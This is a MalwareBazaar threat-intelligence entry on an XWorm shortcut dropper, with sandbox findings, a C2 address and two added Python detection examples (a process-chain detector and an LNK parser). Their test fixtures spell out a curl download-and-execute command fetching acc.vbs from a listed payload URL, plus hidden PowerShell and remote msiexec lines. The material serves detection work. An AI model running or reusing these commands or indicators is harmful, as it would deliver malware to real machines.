MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



XWorm


Vendor detections: 13



SHA256 hash: b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f
SHA3-384 hash: 799de988dd14004a21032a2c57101d840c34a085aa1792696f10f6634579dff7626bfe946335dd3c9bc6dbc3213f7a35
SHA1 hash: 9a00d06939dbd3fcdb605ceb31d449c8d39d1739
MD5 hash: 004eb763047b02f7811776863b415d25
humanhash: harry-lake-seven-lima
File name: GENINSTRFORCONDUCTIONLINECONDUCTOF66THDEEAWANTRGIHQA1771589777[COLIHQ_CC-17719928838].pdf.lnk
Signature: XWorm
File size: 2'830 bytes
First seen: 2026-03-18 13:40:56 UTC
Last seen: Never
File type: Shortcut (lnk)
MIME type: application/x-ms-shortcut
ssdeep: 24:8zJRscSXIEQ7AZPx+/+YjNgLOySU4Ug+/2xaiTi/T4I0zdyDM1JdzS/Lrt+hwvaH:8jscdUZGjiL+Jde/MIsyDM1C9rn8drI
TLSH: T13E51231823EF9724F3BB4E7A2DB6C2904632FC51ACA6E35E2598028C6435714ED71F23
Magika: lnk
Reporter: smica83
Tags: lnk xworm

Intelligence


File Origin
# of uploads: 1
# of downloads: 47
Origin country: HU
Vendor Threat Intelligence
Malware configuration found for: LNK
Details: LNK (a command line and any observed urls)
Verdict: Malicious
Score: 94.1%
Tags: virus sage blic
Result
Verdict: Malicious
File Type: LNK File - Malicious
Payload URLs (URL / File name):
https://dfsl.maharashtra.gov.in/storage/img/acc.vbs / LNK File
Behaviour
BlacklistAPI detected
Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: base64 cmd lolbin masquerade powershell
Result
Verdict: Malicious
File Type: lnk
Detections: Trojan.WinLNK.Agent.sb, HEUR:Trojan.WinLNK.Agent.gen
Result
Threat name: GuLoader, XWorm
Detection: malicious
Classification: troj.expl.evad
Score: 100 / 100
Signature
C2 URLs / IPs found in malware configuration
Found malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a MSI (Microsoft Installer) remotely
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Curl Download And Execute Combination
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Unusual module load detection (module proxying)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Writes to foreign memory regions
WScript reads language and country specific registry keys (likely country aware script)
Wscript starts Powershell (via cmd or directly)
Yara detected GuLoader
Yara detected Powershell decode and execute
Yara detected XWorm
Behaviour
Behavior Graph (ID 1885699; sample: GENINSTRFORCONDUCTIONLINECO...; start date: 18/03/2026; architecture: WINDOWS; score: 100), rendered as a process tree. Signatures the graph attaches to a node are in square brackets; network contacts and dropped files follow "->".

Sample (root) [Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures]
  -> dfsl.maharashtra.gov.in; sn1prdapp01agg02-canary.cloudapp.net; 12 other IPs or domains
  powershell.exe [Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Installs a MSI (Microsoft Installer) remotely; 2 other signatures]
    msiexec.exe [Obfuscated command line found; Installs a MSI (Microsoft Installer) remotely]
      -> 217.217.251.213:7000 (source port 49705; COMUNITELSPAINES, Spain)
      cmd.exe [Obfuscated command line found]
        conhost.exe
        reg.exe
      Acrobat.exe
        AcroCEF.exe
          AcroCEF.exe
            -> 184.29.30.201:443 (source port 49711; FASTNET-AS-IDLinknet-FastnetASNID, United States)
      msiexec.exe
      WerFault.exe
    msiexec.exe [Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Unusual module load detection (module proxying)]
    conhost.exe
  cmd.exe [Wscript starts Powershell (via cmd or directly)]
    wscript.exe [Windows shortcut file (LNK) starts blacklisted processes; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); 2 other signatures]
      cmd.exe [Windows shortcut file (LNK) starts blacklisted processes; Wscript starts Powershell (via cmd or directly)]
        powershell.exe [Found suspicious powershell code related to unpacking or dynamic code loading]
        conhost.exe
    curl.exe
      -> dfsl.maharashtra.gov.in (103.8.188.85:443; source ports 49695, 49697; MHSDC2011-AS4thFloorNewAdministrativeBuildingIN, India)
      -> 127.0.0.1
      -> dropped C:\Users\Public\acc.vbs (ASCII)
    conhost.exe
  powershell.exe [Windows shortcut file (LNK) starts blacklisted processes]
    powershell.exe [Writes to foreign memory regions]
      msiexec.exe [Installs a MSI (Microsoft Installer) remotely]
        msiexec.exe
      msiexec.exe
    conhost.exe
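The Sigma hits listed under Signature (Curl Download And Execute Combination, Script Interpreter Execution From Suspicious Folder, WScript or CScript Dropper) and the "Use of msiexec (install) with remote resource" behaviour all describe links in the process tree shown in the behaviour graph above: cmd.exe runs curl to drop acc.vbs into C:\Users\Public, wscript runs it, a nested cmd launches PowerShell, and PowerShell drives msiexec. The following is an added example, not code from MalwareBazaar or from the sandbox vendor, of how those four rules can be expressed over process-creation telemetry. The events are constructed to mirror the reported tree; the PIDs, the encoded PowerShell argument and the MSI URL are placeholders, since the page does not reproduce them.

```python
"""Flag the LNK -> cmd -> curl -> wscript -> powershell -> msiexec chain in process-creation telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """The fields of a Sysmon event 1 / EDR process-start record that these rules need."""
    pid: int
    ppid: int
    image: str
    cmdline: str


INTERPRETERS = ("wscript", "cscript", "powershell", "pwsh", "mshta", "rundll32", "regsvr32")
USER_DIRS = ("\\users\\public\\", "\\temp\\", "\\appdata\\", "\\downloads\\")


def ancestors(events: dict, pid: int, depth: int = 3):
    """Yield parent image names up to `depth` levels up; in this sample a cmd.exe sits
    between wscript.exe and powershell.exe, so a direct-parent check would miss it."""
    for _ in range(depth):
        ev = events.get(pid)
        if ev is None or ev.ppid not in events:
            return
        pid = ev.ppid
        yield events[pid].image.lower()


def detect(raw: list) -> list:
    """Return (rule, pid) pairs for every event matching one of the four chain rules."""
    events = {e.pid: e for e in raw}
    hits = []
    for e in raw:
        img, cmd = e.image.lower(), e.cmdline.lower()
        # Sigma-style "Curl Download And Execute Combination": fetch to disk and run, one command line
        if (re.search(r"\bcurl(\.exe)?\b", cmd) and re.search(r"\s(-o|--output)\s", cmd)
                and any(re.search(rf"\b{i}(\.exe)?\b", cmd) for i in INTERPRETERS)):
            hits.append(("curl_download_and_execute", e.pid))
        # "Script Interpreter Execution From Suspicious Folder": script path under a user-writable dir
        if img.startswith(("wscript", "cscript", "powershell", "pwsh")) and any(d in cmd for d in USER_DIRS):
            hits.append(("script_interpreter_from_user_dir", e.pid))
        # "WScript or CScript Dropper" / "Wscript starts Powershell": lineage check, not just direct parent
        if img.startswith(("powershell", "pwsh")) and any(
                a.startswith(("wscript", "cscript")) for a in ancestors(events, e.pid)):
            hits.append(("powershell_descends_from_wscript", e.pid))
        # "Use of msiexec (install) with remote resource": install/package switch followed by a URL
        if img.startswith("msiexec") and re.search(r"(/|-)(i|package)\s+https?://", cmd):
            hits.append(("msiexec_remote_install", e.pid))
    return hits


# Constructed events modelled on the sandbox process tree for this sample. PIDs, the -enc blob and
# the MSI URL are placeholders; only the acc.vbs URL and drop path come from the MalwareBazaar page.
EVENTS = [
    ProcEvent(1000, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, "cmd.exe", "cmd.exe /c curl -o C:\\Users\\Public\\acc.vbs "
              "https://dfsl.maharashtra.gov.in/storage/img/acc.vbs & wscript C:\\Users\\Public\\acc.vbs"),
    ProcEvent(1110, 1100, "curl.exe",
              "curl -o C:\\Users\\Public\\acc.vbs https://dfsl.maharashtra.gov.in/storage/img/acc.vbs"),
    ProcEvent(1120, 1100, "wscript.exe", "wscript C:\\Users\\Public\\acc.vbs"),
    ProcEvent(1130, 1120, "cmd.exe", "cmd.exe /c powershell -w hidden -ep bypass -enc QUJD"),
    ProcEvent(1140, 1130, "powershell.exe", "powershell -w hidden -ep bypass -enc QUJD"),
    ProcEvent(1150, 1140, "msiexec.exe", "msiexec /i https://stage.example/pkg.msi /qn"),
    # benign control: a user fetching a file by hand, no interpreter in the same command line
    ProcEvent(2000, 1000, "curl.exe",
              "curl -o C:\\Users\\alice\\Downloads\\tool.zip https://example.com/tool.zip"),
]


def detect_sample() -> list:
    return detect(EVENTS)


if __name__ == "__main__":
    for rule, pid in detect_sample():
        print(f"{rule:36s} pid={pid}")
```

The lineage walk is the part worth copying: the graph shows wscript.exe -> cmd.exe -> powershell.exe, so a rule that only inspects ParentImage for wscript.exe never fires on the PowerShell stage. The benign curl event is there to show that the download rule keys on download-plus-interpreter in one command line, not on curl alone.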
Threat name: Shortcut.Trojan.Generic
Status: Suspicious
First seen: 2026-03-18 13:41:24 UTC
File Type: Binary
AV detection: 7 of 36 (19.44%)
Threat level: 5/5
Result
Malware family:
Score: 10/10
Tags: family:xworm defense_evasion discovery persistence privilege_escalation rat spyware trojan
Behaviour
Enumerates system info in registry
Modifies data under HKEY_USERS
Modifies registry class
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
System Location Discovery: System Language Discovery
System Time Discovery
Drops file in Windows directory
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Adds Run key to start application
Checks computer location settings
Use of msiexec (install) with remote resource
Badlisted process makes network request
Detect Xworm Payload
Xworm
Xworm family
Malware Config
C2 Extraction: 217.217.251.213:7000
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Download_in_LNK
Author: @bartblaze
Description: Identifies download artefacts in shortcut (LNK) files.
Rule name: Execution_in_LNK
Author: @bartblaze
Description: Identifies execution artefacts in shortcut (LNK) files.
Rule name: LNK_sospechosos
Author: Germán Fernández
Description: Detects suspicious .lnk files
Rule name: Script_in_LNK
Author: @bartblaze
Description: Identifies scripting artefacts in shortcut (LNK) files.
Rule name: SUSP_LNK_CMD
Author: SECUINFRA Falcon Team
Description: Detects the reference to cmd.exe inside an lnk file, which is suspicious
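The five YARA rules above, and the "Windows shortcut file (LNK) contains suspicious command line arguments" and "Uses an obfuscated file name to hide its real file extension (double extension)" signatures in the sandbox report, all work from the same static material: the StringData fields of the shortcut (relative path, working directory, command-line arguments) and the file name. The following is an added example, not code from MalwareBazaar or from any of the rule authors, that parses those fields per MS-SHLLINK and applies the same checks in Python. The shortcut it analyses is constructed in the block; its command line is modelled on the reported cmd -> curl -> wscript chain and the acc.vbs URL and drop path listed on this page, and is not the real sample's arguments, which the page does not reproduce.

```python
"""Parse a Windows shortcut (.lnk) per MS-SHLLINK and flag the artefacts LNK droppers rely on."""
import re
import struct
from dataclasses import dataclass

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
HEADER_FMT = "<I16sIIQQQIiIHHII"                 # ShellLinkHeader, 76 bytes
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Living-off-the-land binaries a "document" shortcut has no business chaining
LOLBINS = ("cmd", "powershell", "pwsh", "wscript", "cscript", "mshta", "msiexec",
           "curl", "certutil", "bitsadmin", "rundll32", "regsvr32")
SCRIPT_EXT = (".vbs", ".js", ".ps1", ".bat", ".hta", ".wsf")
DOC_EXT = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png")
STAGING_DIRS = ("\\users\\public\\", "\\temp\\", "\\appdata\\", "%temp%", "%public%")


@dataclass
class Lnk:
    flags: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def parse_lnk(data: bytes) -> Lnk:
    """Walk header -> (LinkTargetIDList) -> (LinkInfo) -> StringData and return the strings."""
    size, clsid, flags = struct.unpack_from(HEADER_FMT, data, 0)[:3]
    if size != 0x4C or clsid != LINK_CLSID:
        raise ValueError("not a ShellLink file")
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # uint16 IDListSize, then the item IDs
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # uint32 LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    lnk = Lnk(flags)

    def read_string() -> str:
        nonlocal off
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        off += count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")

    # StringData structures come in this fixed order, each present only if its flag is set
    for bit, attr in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            setattr(lnk, attr, read_string())
    return lnk


def triage(lnk: Lnk, filename: str) -> list:
    """Static checks in the spirit of the Download/Execution/Script_in_LNK and SUSP_LNK_CMD rules."""
    findings = []
    stem = filename.lower().removesuffix(".lnk")
    if stem != filename.lower() and stem.endswith(DOC_EXT):
        findings.append("double extension masquerading as a document")
    text = " ".join((lnk.relative_path, lnk.working_dir, lnk.arguments)).lower()
    bins = sorted(b for b in LOLBINS if re.search(rf"\b{b}(\.exe)?\b", text))
    if bins:
        findings.append("invokes " + ", ".join(bins))
    findings += ["downloads from " + u for u in re.findall(r"https?://[^\s\"'&|]+", text)]
    if any(ext in text for ext in SCRIPT_EXT):
        findings.append("references a script payload")
    if any(d in text for d in STAGING_DIRS):
        findings.append("stages payload in a user-writable folder")
    if len(lnk.arguments) > 260:
        findings.append("unusually long command line (likely padded/obfuscated)")
    return findings


def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Constructed test fixture: a minimal Unicode ShellLink carrying three StringData fields."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS
    header = struct.pack(HEADER_FMT, 0x4C, LINK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def enc(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(relative_path) + enc(working_dir) + enc(arguments)


# Constructed command line modelled on the reported cmd -> curl -> wscript chain; the real sample's
# arguments are not reproduced on the MalwareBazaar page. The file name is the one listed there.
SAMPLE_NAME = "GENINSTRFORCONDUCTIONLINECONDUCTOF66THDEEAWANTRGIHQA1771589777[COLIHQ_CC-17719928838].pdf.lnk"
SAMPLE_ARGS = ("/c curl -o C:\\Users\\Public\\acc.vbs https://dfsl.maharashtra.gov.in/storage/img/acc.vbs"
               " & wscript C:\\Users\\Public\\acc.vbs")
SAMPLE_LNK = build_lnk("..\\..\\..\\Windows\\System32\\cmd.exe", "C:\\Users\\Public", SAMPLE_ARGS)


def triage_sample() -> list:
    return triage(parse_lnk(SAMPLE_LNK), SAMPLE_NAME)


if __name__ == "__main__":
    for finding in triage_sample():
        print("-", finding)
```

The parser deliberately stops after StringData; the ExtraData blocks that follow (TrackerDataBlock with the origin machine name and MAC, EnvironmentVariableDataBlock with the unexpanded target) are useful for attribution but not for the download/execute heuristics above. Note that the target path in a shortcut normally lives in the LinkTargetIDList, so a production parser should also decode item IDs; here the relative path is enough to catch the cmd.exe reference that SUSP_LNK_CMD looks for.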

File information


The table below shows additional information about this malware sample such as delivery method and external references.

XWorm

Shortcut (lnk) b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f (this sample)

Comments